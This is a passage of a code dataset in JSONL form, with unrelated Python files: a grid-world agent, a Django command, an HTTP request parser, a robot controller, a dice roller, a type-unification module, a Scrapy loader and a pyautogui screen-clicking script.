nearest_empty = empty_pos[np.argmin(distances)].tolist()\n path = self.env.a_star(tuple(state['agent_pos']), tuple(nearest_empty), state['grid'])\n if path is not None and len(path) > 0:\n path = list(reversed(path)) # Reverse the path\n next_pos = path[1] if len(path) > 1 else path[0] # Get the next position\n return 'right' if next_pos[1] > state['agent_pos'][1] else 'left' if next_pos[1] < state['agent_pos'][1] else 'down' if next_pos[0] > state['agent_pos'][0] else 'up'\n\n # No available moves\n return None\n\n\n\n\nif __name__ == \"__main__\":\n env = GridEnvironment()\n agent = SimpleAgent(env)\n\n for episode_idx in range(1):\n state = env.reset()\n done = False\n while not done:\n action = agent.act(state)\n if action is None:\n break\n state, done = env.step(action)\n 
print_env(state)\n","repo_name":"lblcbc/Collect_Gather_Build","sub_path":"sim_method.py","file_name":"sim_method.py","file_ext":"py","file_size_in_byte":6778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24752576811","text":"import sys\nfrom argparse import ArgumentParser\nfrom typing import Any\n\nfrom django.core.management.base import BaseCommand\n\nfrom analytics.lib.counts import COUNT_STATS, do_drop_single_stat\n\nclass Command(BaseCommand):\n    help = \"\"\"Clear analytics tables.\"\"\"\n\n    def add_arguments(self, parser: ArgumentParser) -> None:\n        parser.add_argument('--force',\n                            action='store_true',\n                            help=\"Actually do it.\")\n        parser.add_argument('--property',\n                            type=str,\n                            help=\"The property of the stat to be cleared.\")\n\n    def handle(self, *args: Any, **options: Any) -> None:\n        property = options['property']\n        if property not in COUNT_STATS:\n            print(\"Invalid property: %s\" % (property,))\n            sys.exit(1)\n        if not options['force']:\n            print(\"No action taken. Use --force.\")\n            sys.exit(1)\n\n        do_drop_single_stat(property)\n","repo_name":"18-2-SKKU-OSS/2018-2-OSS-L5","sub_path":"analytics/management/commands/clear_single_stat.py","file_name":"clear_single_stat.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"26955557691","text":"class HttpRequest(object):\n\n    def __init__(self, response):\n        # print('raw request data sent by the browser', response)\n        data = response.split('\\r\\n')\n        # print(data)\n        self.FirstLine = data[0]\n        self.body = data[1:]\n        self.method = self.FirstLine.split(\" \")[0]\n        # carries the url and params, but not the port\n        self.full_path = self.FirstLine.split(\" \")[1]\n        self.GET = self.full_path.rsplit('?', 1)[-1]\n        self.path = self.full_path.split(\"?\")[0]\n        # HTTP protocol and version number\n        self.HTTP = self.FirstLine.split(\" \")[2]\n        self.HOST = data[1].split(\" \")[-1].split(\":\")[0]\n        self.PORT = data[1].split(\" \")[-1].split(\":\")[1]\n\n        self.POST = data[-1]\n        self.body = data[1:]\n        self.META = self.body[:-2]\n        self.GET = self.__dic_from_str(self.GET)\n        self.POST = self.__dic_from_str(self.POST)\n        self.__process_meta()\n        self.COOKIES = self.META.get('Cookie', None)\n        if self.COOKIES:\n            self.COOKIES = self.__dic_from_str(self.COOKIES, seq=\";\")\n\n    def __dic_from_str(self, content, seq=\"&\"):\n        try:\n            lst = content.split(seq)\n            dic = {}\n            for item in lst:\n                a, b = item.strip().split('=', 1)\n                dic.update({a: b})\n            ret = dic\n        except AttributeError:\n            ret = {}\n        except ValueError:\n            ret = {}\n        return ret\n\n    def __process_meta(self):\n        dic = {}\n        for item in self.META:\n            a, b = item.split(':', 1)\n            dic.update({a: b})\n        self.META = dic\n","repo_name":"DengJackNo1/web_framework","sub_path":"socket_django/MyWeb_framework/core/http/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35857900363","text":"import time\nfrom busio import I2C\nfrom adafruit_seesaw.seesaw import Seesaw\nfrom adafruit_seesaw.pwmout import PWMOut\nfrom adafruit_motor import motor, servo\nfrom digitalio import DigitalInOut, Direction, Pull\nimport board\n\nprint(\"Mag Neat-o!\")\n\n# Create seesaw object\ni2c = I2C(board.SCL, board.SDA)\nseesaw = Seesaw(i2c)\n\n# Create one motor on seesaw PWM pins 22 & 23\nmotor_a = motor.DCMotor(PWMOut(seesaw, 22), PWMOut(seesaw, 23))\n# Create another motor on seesaw PWM pins 19 & 18\nmotor_b = 
motor.DCMotor(PWMOut(seesaw, 19), PWMOut(seesaw, 18))\n\n# Create servo object\npwm = PWMOut(seesaw, 17) # Servo 1 is on s.s. pin 17\npwm.frequency = 50 # Servos like 50 Hz signals\nmy_servo = servo.Servo(pwm) # Create my_servo with pwm signa\nmy_servo.angle = 90\n\ndef smooth_move(start, stop, num_steps):\n return [(start + (stop-start)*i/num_steps) for i in range(num_steps)]\n\nbuttona = DigitalInOut(board.BUTTON_A)\nbuttona.direction = Direction.INPUT\nbuttona.pull = Pull.DOWN\n\nbuttonb = DigitalInOut(board.BUTTON_B)\nbuttonb.direction = Direction.INPUT\nbuttonb.pull = Pull.DOWN\n\nswitch = DigitalInOut(board.SLIDE_SWITCH)\nswitch.direction = Direction.INPUT\nswitch.pull = Pull.UP\n\nlast_buttona = buttona.value\nlast_buttonb = buttonb.value\nlast_switch = switch.value\n\nlast_touch1 = False\nlast_touch4 = False\n\n\nwhile True:\n touch_vals = (seesaw.touch_read(0), seesaw.touch_read(3))\n # print(touch_vals)\n\n touch1 = False\n if seesaw.touch_read(0) > 500:\n touch1 = True\n\n if touch1 != last_touch1:\n if touch1:\n start_angle = my_servo.angle\n end_angle = start_angle - 20\n end_angle = max(0, min(end_angle, 180))\n print(\"left from\", start_angle, \"to\", end_angle)\n for a in smooth_move(start_angle, end_angle, 25):\n my_servo.angle = a\n time.sleep(0.03)\n last_touch1 = touch1\n\n touch4 = False\n if seesaw.touch_read(3) > 500:\n touch4 = True\n\n if touch4 != last_touch4:\n if touch4:\n start_angle = my_servo.angle\n end_angle = start_angle + 20\n end_angle = max(0, min(end_angle, 180))\n print(\"right from\", start_angle, \"to\", end_angle)\n for a in smooth_move(start_angle, end_angle, 25):\n my_servo.angle = a\n time.sleep(0.03)\n last_touch4 = touch4\n\n if buttona.value != last_buttona:\n if buttona.value:\n print(\"down\")\n if motor_a.throttle:\n print(\"haulin!\")\n motor_b.throttle = -0.1\n else:\n motor_b.throttle = -0.1\n else:\n motor_b.throttle = 0\n last_buttona = buttona.value\n\n if buttonb.value != last_buttonb:\n if buttonb.value:\n print(\"up\")\n if motor_a.throttle:\n print(\"haulin!\")\n motor_b.throttle = 0.4\n else:\n motor_b.throttle = 0.3\n else:\n motor_b.throttle = 0\n last_buttonb = buttonb.value\n\n if switch.value != last_switch:\n motor_a.throttle = switch.value\n if motor_a.throttle:\n print(\"GRAB\")\n else:\n print(\"RELEASE\")\n last_switch = switch.value\n\n time.sleep(0.01)\n","repo_name":"adafruit/Adafruit_Learning_System_Guides","sub_path":"Crickits/mag_neat_o/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","stars":913,"dataset":"github-code","pt":"5"} +{"seq_id":"16235552702","text":"import random\r\nimport argparse\r\nimport re\r\n\r\nhelp =\"\"\"\r\nSimple dice program to evaluate mutli-sided dice, fudge dice and exploding dice.\\n\r\n\r\nUsage:\r\n\r\npython roller.py\r\n\r\ndicenumber = number of rolled dice.\r\nmode = d, f, ! or s.\r\n'd' will output the diceresults.\r\n's' will output the sum of the dicerolls.\r\n'!' will output exploding dice.\r\n'f' is used for fudge dice. 
Since fudge dice are always the same, the input is f.\r\nnumber of sides = number of sides of the dice.\r\n\r\nexample:\r\n\r\nroller.exe 2s10 - will print the sum of two ten-sided dice.\r\nroller.exe 3d6 - will print the output of 3 six-sided dice.\r\nroller.exe 20!6 - will print the output of 20 six-sided exploding dice.\r\nroller.exe 6f - will print the output and sum of 6 fudge dice.\r\n\"\"\"\r\n\r\nparser = argparse.ArgumentParser(description=help, formatter_class=argparse.RawDescriptionHelpFormatter)\r\n\r\n\r\nparser.add_argument(\"dice\", type=str)\r\nargs = parser.parse_args()\r\n\r\n#TODO helpfile\r\n# -h, h, /h, --help\r\n\r\n\r\na = re.findall(pattern=\"^\\d+\", string=args.dice)\r\nb = re.findall(pattern=\"\\D\", string=args.dice)\r\nc = re.findall(pattern=\"\\d+$\", string=args.dice)\r\n\r\ndef roll(num):\r\n    return random.randrange(1,num + 1)\r\n\r\ndef recrand(x,a=0):\r\n    while a%x<1:a+=random.randint(1,x)\r\n    return a\r\n\r\nlist = []\r\n\r\nstring = \"\".join(b)\r\n\r\n\r\nif string != 'f':\r\n    if string != '!':\r\n        for x in range(int(a[0])):\r\n            list.append(roll(int(c[0])))\r\n\r\n    else:\r\n        for x in range(int(a[0])):\r\n            list.append(recrand(int(c[0])))\r\n        print((str(list)))\r\n\r\n    if string == 'd':\r\n        separator = \",\"\r\n        print((str(list)))\r\n\r\n    elif string == 's!':\r\n        sum = 0\r\n        for i in list:\r\n            if int(i) == int(c[0]):\r\n                sum = sum + int(i) + roll(int(c[0]))\r\n            else:\r\n                sum = sum + int(i)\r\n        print(sum)\r\n\r\n    elif string == 's':\r\n        sum = 0\r\n        for i in list:\r\n            sum = sum + int(i)\r\n        print(sum)\r\n\r\n\r\nelse:\r\n    for x in range(int(a[0])):\r\n        list.append(roll(3))\r\n    translation = {1: \"+\", 2: \" \", 3: \"-\"}\r\n    summe = 0\r\n    for x in list:\r\n        if x == 1:\r\n            summe += 1\r\n        elif x == 3:\r\n            summe -= 1\r\n        else:\r\n            pass\r\n    for i,x in enumerate(list):\r\n        list[i] = translation[x]\r\n    print(list)\r\n    print(summe)","repo_name":"Psycr0w/DiceRoller","sub_path":"roller.py","file_name":"roller.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71788016792","text":"import gzip\nimport io\nimport unittest\n\nfrom bytesbufio import BytesBufferIO\n\nTEXT = \"Hello world.\\n\"\n\n\nclass BytesBufferIOTest(unittest.TestCase):\n    def test_value_available_after_close(self):\n        bytesout = BytesBufferIO()\n        with io.TextIOWrapper(bytesout, encoding='utf-8') as textout:\n            textout.write(TEXT)\n        self.assertEqual(TEXT, bytesout.getvalue().decode('utf-8'))\n\n    def test_value_available_after_close_with_gzip(self):\n        bytesbufio = BytesBufferIO()\n        with gzip.open(bytesbufio, mode=\"wt\", encoding='utf-8') as textout:\n            textout.write(TEXT)\n        with gzip.open(io.BytesIO(bytesbufio.getvalue()), mode=\"rt\") as textin:\n            self.assertEqual(TEXT, textin.read())\n","repo_name":"shamp00the-cat/movierecs","sub_path":".venv/lib/python3.11/site-packages/tests/bytes_buffer_io_test.py","file_name":"bytes_buffer_io_test.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"43398965565","text":"from hybridts.type_encoding import *\nfrom hybridts import exc\nfrom collections import defaultdict, ChainMap\nimport typing as t\ntry:\n    # noinspection PyUnresolvedReferences\n    from hybridts.tc_state import TCState\nexcept 
ImportError:\n pass\n\n\nclass RowCheckFailed(Exception):\n pass\n\n\nclass StructureKeeper:\n is_finished: bool\n\n def update(self, tcs: 'TCState', path_lhs: Path) -> None:\n raise NotImplementedError\n\n\n# class FlexibleStructureKeeper(StructureKeeper):\n# freshes: t.List[Fresh]\n# vars: t.List[Var]\n# fresh_pathes: t.List[T]\n# var_paths: t.List[T]\n# is_finished: bool\n#\n# def __init__(self, freshes: t.List[Fresh], vars: t.List[Var],\n# fresh_pathes: t.List[T], var_paths: t.List[T]):\n# self.freshes = freshes\n# self.vars = vars\n# self.fresh_pathes = fresh_pathes\n# self.var_paths = var_paths\n# self.is_finished = False\n#\n# def __repr__(self):\n# # TODO\n# return 'FlexibleStructure({!r} = {!r} ~ {!r} = {!r})'.format(\n# self.freshes, self.fresh_pathes, self.vars, self.var_paths)\n#\n# def update(self, tcs: 'TCState', path_lhs: Path) -> None:\n# var_paths = tuple(tcs.path_infer(path)[0] for path in self.var_paths)\n# fresh_paths = tuple(\n# tcs.path_infer(path)[0] for path in self.fresh_pathes)\n#\n# lookup = {k: v for k, v in zip(fresh_paths, self.freshes)}\n#\n# def subst(_, t):\n# return (), lookup.get(t, t)\n#\n# vars_path_tp = Tuple(var_paths)\n# vars_path_tp = pre_visit(subst)((), tcs.infer(vars_path_tp))\n#\n# for var, each in zip(self.vars, vars_path_tp.elts):\n# tcs.unify(var, each)\n#\n# vars_ftv = ftv(vars_path_tp)\n# if not vars_ftv:\n# self.is_finished = True\n# # TODO:\n# # forall a. a -> var\n# # unify with ('i -> 'j) -> ('j -> 'i), where\n# # 'i, 'j are variables,\n# # this certainly can be true, unless\n# # infer(i') != infer('j) and\n# # infer(i') = some non-var and\n# # infer(j') = some non-var\n#\n# else:\n# # fresh_paths_ftv = ftv(Tuple(fresh_paths))\n# # if fresh_paths_ftv.issuperset(vars_ftv):\n# # raise exc.StructureCannotUnify(vars)\n# path_lhs, _ = tcs.path_infer(path_lhs)\n# structures = tcs.get_structures()\n# for fv in ftv(path_lhs):\n# structures[fv].add(self)\n\n# class RigidStructureKeeper(StructureKeeper):\n# template: T\n# path: T\n# is_finished: bool\n#\n# def __init__(self, template: T, path: T):\n# self.template = template\n# self.path = path\n# self.is_finished = False\n#\n# def __repr__(self):\n# return 'RigidStructure({!r} = {!r})'.format(self.template, self.path)\n#\n# def update(self, tcs: 'TCState', path_lhs: Path) -> None:\n# path, _ = tcs.path_infer(self.path)\n# _, structure = fresh_ftv(path)\n#\n# tcs.unify(structure, self.template)\n#\n# if not ftv(tcs.infer(self.template)):\n# self.is_finished = True\n# else:\n# path_lhs, _ = tcs.path_infer(path_lhs)\n# structures = tcs.get_structures()\n# for fv in ftv(path_lhs):\n# structures[fv].add(self)\n\n\ndef update(tcs: 'TCState', bounds, vars, freshed_bounds, freshed_vars) -> None:\n\n left = Tuple(bounds + vars)\n right = Tuple(freshed_bounds + freshed_vars)\n path, _ = tcs.path_infer(right)\n rev_map, structure = fresh_ftv(path)\n tcs.unify(left, structure)\n\n ftv_vars = ftv(tcs.infer(structure))\n if ftv_vars:\n resume = {tcs.infer(v): k for k, v in rev_map.items()}\n for ftv_var in ftv_vars:\n tcs.unify(resume[ftv_var], ftv_var)\n\n\ndef make(self: 'TCState', tctx: TypeCtx,\n structures: t.Dict[Var, t.Set[StructureKeeper]]):\n\n # fresh variables are guaranteed to be not free due to syntax restriction of forall\n # thus, when proceeding unification, freshvar cannot be greater or lesser than\n # any other type except another fresh variable.\n # However, fresh variable can only equal to another by a bidirectional name mapping\n\n structures: t.Dict[Var,\n t.Set[StructureKeeper]] = 
structures or defaultdict(set)\n self.get_tctx = lambda: tctx\n\n # key => [(template, path)]\n # every time, `path` gets updatd, we fresh all type variables in `path`, which\n # produces a closed new type, and use this unify with `template`\n\n def subst_once(subst_map: t.Dict[T, T], ty):\n return subst_map, subst_map.get(ty, ty)\n\n def subst(subst_map: t.Dict[T, T], ty: T):\n return pre_visit(subst_once)(subst_map, ty)\n\n def occur_in(var: T, ty: T) -> bool:\n if var is ty:\n return False\n\n def visit_func(tt: T):\n return not isinstance(tt, Var) or tt is not var\n\n return not visit_check(visit_func)(ty)\n\n def infer_row(x: Row) -> t.Tuple[t.Optional[Row], Row]:\n if isinstance(x, RowCons):\n field_path, field_t = path_infer(x.field_type)\n tl_path, tl_t = infer_row(x.tail)\n if field_path and tl_path:\n path = RowCons(x.field_name, field_path, tl_path)\n else:\n path = None\n return path, RowCons(x.field_name, field_t, tl_t)\n if isinstance(x, RowMono):\n return None, x\n if isinstance(x, RowPoly):\n path_p, t_p = path_infer(x.type)\n if path_p:\n path = RowPoly(path_p)\n else:\n path = None\n return path, RowPoly(t_p)\n raise TypeError(x)\n\n def path_infer(x: T) -> t.Tuple[t.Optional[Path], T]:\n if isinstance(x, Nom):\n return None, x\n\n if isinstance(x, Var):\n path_end = tctx.get(x)\n if not path_end:\n return x, x\n path_x, end = path_end\n path_y, y = path_infer(end)\n path, end = tctx[x] = (path_y or path_x or x), y\n if x.is_rigid and not isinstance(end, LeafTypes):\n raise exc.RigidTypeExpanding(x)\n\n return path, end\n\n if isinstance(x, Fresh):\n return x, x\n\n if isinstance(x, App):\n f_path, f_t = path_infer(x.f)\n arg_path, arg_t = path_infer(x.arg)\n if f_path and arg_path:\n path = App(f_path, arg_path)\n else:\n path = None\n return path, App(f_t, arg_t)\n if isinstance(x, Arrow):\n ret_path, ret_t = path_infer(x.ret)\n arg_path, arg_t = path_infer(x.arg)\n if ret_path and arg_path:\n path = Arrow(arg_path, ret_path)\n else:\n path = None\n return path, Arrow(arg_t, ret_t)\n if isinstance(x, Implicit):\n arg_path, arg_t = path_infer(x.witness)\n ret_path, ret_t = path_infer(x.type)\n if ret_path and arg_path:\n path = Implicit(arg_path, ret_path)\n else:\n path = None\n return path, Implicit(arg_t, ret_t)\n if isinstance(x, Tuple):\n if not x.elts:\n return None, x\n paths, ts = zip(*map(path_infer, x.elts))\n if all(paths):\n path = Tuple(paths)\n else:\n path = None\n return path, Tuple(ts)\n if isinstance(x, Forall):\n poly_path, poly_t = path_infer(x.poly_type)\n if poly_path:\n path = Forall(x.token, x.fresh_vars, poly_path)\n else:\n path = None\n return path, Forall(x.token, x.fresh_vars, poly_t)\n if isinstance(x, Record):\n path_row, row_t = infer_row(x.row)\n if not path_row:\n path = None\n else:\n path = Record(path_row)\n\n if isinstance(path_row, RowPoly):\n path = path_row.type\n\n if isinstance(row_t, RowPoly):\n type = row_t.type\n else:\n type = Record(row_t)\n\n return path, type\n raise TypeError(x)\n\n def inst_forall_with_structure_preserved(bound_vars: t.Iterable[Fresh],\n polytype: T):\n mapping: t.Dict[T, Var] = {\n b: InternalVar(is_rigid=True)\n for b in bound_vars\n }\n vars: t.Dict[Var, Var] = {}\n chain = ChainMap(vars, mapping)\n # forall a. var -> a\n # forall b. 
b -> b\n # var -> i\n # j -> j\n _, monotype = fresh_ftv(polytype, chain)\n # lhs, rhs = zip(*mapping.items())\n # assert mapping\n # structure_keeper = RigidStructureKeeper(Tuple(lhs), Tuple(rhs))\n # for each in rhs:\n # structures[each].add(structure_keeper)\n return mapping, vars, monotype\n\n # def inst_with_structure_preserved(type,\n # rigid=False\n # ) -> t.Tuple[t.Dict[T, Var], T]:\n # if isinstance(type, Forall):\n # poly_type = type.poly_type\n # if rigid:\n # mapping: t.Dict[T, Var] = {b: InternalVar(is_rigid=True) for b in type.fresh_vars}\n # _, poly_type = just_fresh_bounds(poly_type, mapping)\n # if mapping:\n # lhs, rhs = zip(*mapping.items())\n # structure_keeper = RigidStructureKeeper(\n # Tuple(lhs), Tuple(rhs))\n # for each in rhs:\n # structures[each].add(structure_keeper)\n # else:\n # mapping: t.Dict[T, Var] = {b: InternalVar(is_rigid=False) for b in type.fresh_vars}\n # _, poly_type = just_fresh_bounds(poly_type, mapping)\n #\n # vars = {}\n # freshes = {}\n # for k, v in mapping.items():\n # if isinstance(k, Var):\n # kv = vars\n # else:\n # assert isinstance(k, Fresh)\n # kv = freshes\n # kv[k] = v\n # if not vars:\n # return mapping, poly_type\n #\n # freshes, fresh_paths = zip(*freshes.items())\n # vars, var_paths = zip(*vars.items())\n # structure_keeper = FlexibleStructureKeeper(\n # list(freshes), list(vars), list(fresh_paths),\n # list(var_paths))\n # for each in mapping.values():\n # structures[each].add(structure_keeper)\n # type = poly_type\n # else:\n # mapping = {}\n # return mapping, type\n\n def inst_without_structure_preserved(type,\n rigid=False\n ) -> t.Tuple[t.Dict[T, Var], T]:\n \"\"\"\n When using this, there should be no free variable in the scope of forall!\n \"\"\"\n if isinstance(type, Forall):\n mapping: t.Dict[T, Var] = {\n b: InternalVar(is_rigid=rigid)\n for b in type.fresh_vars\n }\n type = type.poly_type\n _, type = just_fresh_bounds(type, mapping)\n return mapping, type\n return {}, type\n\n def _unify(lhs: T, rhs: T, path_lhs: Path, path_rhs: Path) -> None:\n if lhs is rhs:\n # Nom, Fresh, Var\n return\n\n if isinstance(lhs, Var):\n if occur_in(lhs, rhs):\n raise exc.IllFormedType(\" a = a -> b\")\n if lhs.is_rigid:\n if not isinstance(rhs, Var):\n raise exc.TypeMismatch(lhs, rhs)\n path_rhs, _ = path_infer(rhs)\n tctx[lhs] = (path_rhs or path_lhs), rhs\n structure_keepers = structures.get(lhs)\n if structure_keepers:\n for structure_keeper in tuple(structure_keepers):\n if structure_keeper.is_finished:\n structure_keepers.remove(structure_keeper)\n continue\n else:\n structure_keeper.update(self, path_lhs)\n return\n\n if isinstance(rhs, Var):\n return _unify(rhs, lhs, path_rhs, path_lhs)\n\n if isinstance(lhs, Forall) and isinstance(rhs, Forall):\n freshes_l, vars_l, l_p = inst_forall_with_structure_preserved(\n lhs.fresh_vars, lhs.poly_type)\n freshes_r, vars_r, r_p = inst_forall_with_structure_preserved(\n rhs.fresh_vars, rhs.poly_type)\n unify(l_p, r_p)\n if vars_l:\n a, b = zip(*freshes_l.items())\n c, d = zip(*vars_l.items())\n update(self, a, c, b, d)\n if vars_r:\n a, b = zip(*freshes_r.items())\n c, d = zip(*vars_r.items())\n update(self, a, c, b, d)\n return\n\n if isinstance(lhs, Implicit) and isinstance(rhs, Implicit):\n unify(lhs.witness, rhs.witness)\n unify(lhs.type, rhs.type)\n return\n\n if isinstance(lhs, Fresh) and isinstance(rhs, Fresh):\n if lhs.token is rhs.token and lhs.name == rhs.name:\n return\n raise exc.TypeMismatch(lhs, rhs)\n if isinstance(lhs, Arrow) and isinstance(rhs, Arrow):\n unify(lhs.arg, 
rhs.arg)\n unify(lhs.ret, rhs.ret)\n return\n\n if isinstance(lhs, App) and isinstance(rhs, App):\n unify(lhs.f, rhs.f)\n unify(lhs.arg, rhs.arg)\n return\n\n if isinstance(lhs, Tuple) and isinstance(rhs, Tuple):\n for a, b in zip(lhs.elts, rhs.elts):\n unify(a, b)\n return\n\n if isinstance(lhs, Record) and isinstance(rhs, Record):\n m1, ex1 = extract_row(lhs.row)\n m2, ex2 = extract_row(rhs.row)\n common_keys = m1.keys() & m2.keys()\n only_by1 = {k: v for k, v in m1.items() if k not in common_keys}\n only_by2 = {k: v for k, v in m2.items() if k not in common_keys}\n\n for k in common_keys:\n unify(m1[k], m2[k])\n\n def row_check(row1, row2, only_by1, only_by2):\n if row1 is None and row2 is None:\n if only_by1 or only_by2:\n raise RowCheckFailed\n return\n if row2 is None:\n return row_check(row2, row1, only_by2, only_by1)\n if row1 is None:\n # only_by1 == {only_by2 | row2}\n # where\n # only_by1 \\cap only_by2 = \\emptyset,\n # therefore,\n # only_by2 = \\emptyset,\n # row2 = only_by1\n if only_by2:\n raise RowCheckFailed\n return unify(row2, Record(row_of_map(only_by1, empty_row)))\n # {only_by1|row1} == {only_by2|row2},\n # where\n # only_by1 \\cap only_by2 = \\emptyset,\n # therefore,\n # forall type in only_by2. type in row1, and\n # forall type in only_by1. type in row2,\n # therefore,\n # t1 = {only_by1 \\cup only_by2|row} = t2,\n # {only_by1|row} = row2\n # {only_by2|row} = row1\n polyrow = RowPoly(InternalVar(is_rigid=False))\n ex2 = Record(row_of_map(only_by1, polyrow))\n ex1 = Record(row_of_map(only_by2, polyrow))\n unify(row1, ex1)\n unify(row2, ex2)\n\n try:\n return row_check(ex1, ex2, only_by1, only_by2)\n except RowCheckFailed:\n raise exc.TypeMismatch(lhs, rhs)\n raise exc.TypeMismatch(lhs, rhs)\n\n def unify(lhs, rhs):\n\n path_lhs, lhs = path_infer(lhs)\n path_rhs, rhs = path_infer(rhs)\n _unify(lhs, rhs, path_lhs, path_rhs)\n\n def infer(t):\n return path_infer(t)[1]\n\n # self.inst_with_structure_preserved = inst_with_structure_preserved\n def relink(var: Var, t: T):\n tctx[var] = path_infer(t)\n\n self.relink = relink\n self.inst_without_structure_preserved = inst_without_structure_preserved\n self.unify = unify\n self.path_infer = path_infer\n self.occur_in = occur_in\n self.extract_row = extract_row\n self.infer = infer\n self.get_structures = lambda: structures\n","repo_name":"RemuLang/hybrid-type-system","sub_path":"hybridts/tc_make.py","file_name":"tc_make.py","file_ext":"py","file_size_in_byte":16733,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"9626623422","text":"class Rect:\n def __init__(self, x, y, width, height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.bottom = y + height\n self.right = x + width\n\n def x_ratio(self, search):\n if search < self.x:\n return 0\n elif search > self.x + self.width:\n return 1\n else:\n ratio = (search - self.x) / self.width\n return self._approx(ratio, 0.5, 0.1)\n\n def y_ratio(self, search):\n if search < self.y:\n return 0\n elif search > self.y + self.height:\n return 1\n else:\n ratio = (search - self.y) / self.height\n return self._approx(ratio, 0.5, 0.1)\n\n @staticmethod\n def _approx(value, center, delta):\n if abs(value - center) < delta:\n return center\n return value\n\n def to_dict_str(self):\n return {\n \"x\": str(self.x),\n \"y\": str(self.y),\n \"width\": str(self.width),\n \"height\": str(self.height),\n 
}\n","repo_name":"hbmartin/graphviz2drawio","sub_path":"graphviz2drawio/models/Rect.py","file_name":"Rect.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"5"} +{"seq_id":"37067197931","text":"import re\n\nfrom scrapy.loader.processors import Compose\nfrom scrapy.loader.processors import Join\n\nfrom .base_loader import BaseLoader\n\n\nclass LiberationLoader(BaseLoader):\n \n def clean_date(rawdata):\n date = re.sub(\"[^0-9-]\", \"\", rawdata)\n date = date[0:len(date)-6]\n date = date.replace(\"-\", \"/\")\n date = date.split(\"/\")\n date[2], date[0] = date[0], date[2]\n date = \"/\".join(date)\n return date\n\n def clean_title(rawdata):\n return rawdata[0].replace(\" - Libération\", \"\")\n \n def clean_author(rawdata):\n return rawdata.replace(\" LIBERATION\", \"\")\n\n date_in = Compose(lambda v: v[0], clean_date)\n title_in = Compose(clean_title)\n author_out = Compose(Join(\", \"), clean_author)\n","repo_name":"gbolmier/newspaper-crawler","sub_path":"newspaper_crawler/loaders/liberation_loader.py","file_name":"liberation_loader.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"5"} +{"seq_id":"27046953312","text":"from typing import Sequence\n\n\nclass Solution:\n def imageSmoother(self, img: Sequence[Sequence[int]]) -> Sequence[Sequence[int]]:\n r = len(img)\n c = len(img[0])\n\n def neighbor(x, y):\n ret = []\n for dx in [-1, 0, 1]:\n if 0 <= x + dx < r:\n for dy in [-1, 0, 1]:\n if 0 <= y + dy < c:\n ret.append((x + dx, y + dy))\n return ret\n\n new_image = [[0] * c for _ in range(r)]\n for i in range(r):\n for j in range(c):\n neighbors = neighbor(i, j)\n new_image[i][j] = int(sum(img[x][y] for x, y in neighbors) / len(neighbors))\n return new_image\n","repo_name":"XinweiChai/leetcode_problems","sub_path":"python/problem661.py","file_name":"problem661.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38736713969","text":"# -*- encoding: utf-8 -*-\n\nimport os, time\nfrom time import sleep\nfrom PIL import Image\nimport math\nimport operator\nfrom functools import reduce\nimport cv2\nimport pyautogui as pag\nfrom pyautogui import click\nfrom pyautogui import dragTo\nfrom pyautogui import scroll\n\n\ndef compare_pic(pic1, pic2):\n image1 = Image.open(pic1)\n image2 = Image.open(pic2)\n\n histogram1 = image1.histogram()\n histogram2 = image2.histogram()\n\n differ = math.sqrt(\n reduce(operator.add, list(map(lambda a, b: (a - b) ** 2, histogram1, histogram2))) / len(histogram1))\n\n print(differ)\n return differ\n\n\ndef cut_img():\n img = pag.screenshot(region=[238, 1025, 80, 60]) # x,y,w,h\n img.save('src_pc/img/tmp.png')\n # cmd1 = \"adb -s \" + serial + \" shell screencap -p /data/tmp.png\"\n # cmd2 = \"adb -s \" + serial + \" pull /data/tmp.png \" + os.path.join(src_path, \"tmp.png\")\n # os.system(cmd1)\n # os.system(cmd2)\n # img = cv2.imread(\"src_pc/img/tmp.png\")\n # newimg = img[1124:384, 1210:599]\n # cv2.imwrite(\"look_ad.png\", newimg)\n\n\ndef look_ad_diff():\n img = pag.screenshot(region=[238, 1025, 80, 60]) # x,y,w,h\n img.save('src_pc/img/look_ad_tmp.png')\n # img = cv2.imread(\"src/img/tmp.png\")\n # newimg = img[1124:1210, 384:599]\n # cv2.imwrite(\"src/img/look_ad_tmp.png\", newimg)\n return compare_pic(\"src_pc/img/look_ad_tmp.png\", \"src_pc/img/look_ad.png\")\n\ndef 
reset_ad_diff():\r\n    reset = pag.screenshot(region=[423, 1010, 84, 44]) # x,y,w,h\r\n    # ad = pag.screenshot(region=[238, 1025, 80, 60]) # x,y,w,h\r\n    reset.save('src_pc/img/reset_tmp.png')\r\n    # ad.save('src_pc/img/ad_tmp.png')\r\n    # ad_diff = compare_pic(\"src_pc/img/ad_tmp.png\", \"src_pc/img/look_ad.png\")\r\n    reset_diff = compare_pic(\"src_pc/img/reset_tmp.png\", \"src_pc/img/reset.png\")\r\n    return reset_diff\r\n\r\ndef long_ad():\r\n    long_ad = pag.screenshot(region=[119, 1039, 141, 50])\r\n    long_ad.save('src_pc/img/long_ad_tmp.png')\r\n    long_ad_diff = compare_pic(\"src_pc/img/long_ad_tmp.png\", \"src_pc/img/long_ad.png\")\r\n    return long_ad_diff\r\n\r\ndef auto_click():\r\n    start = time.time()\r\n    time_power = 0.5\r\n    time_add_goods = 2\r\n    while True:\r\n        for j in range(3):\r\n            for i in range(10):\r\n                click(162 + i * 36, 1251 + j * 40)\r\n        # if time.time() - start > 20:\r\n        #     break\r\n        # 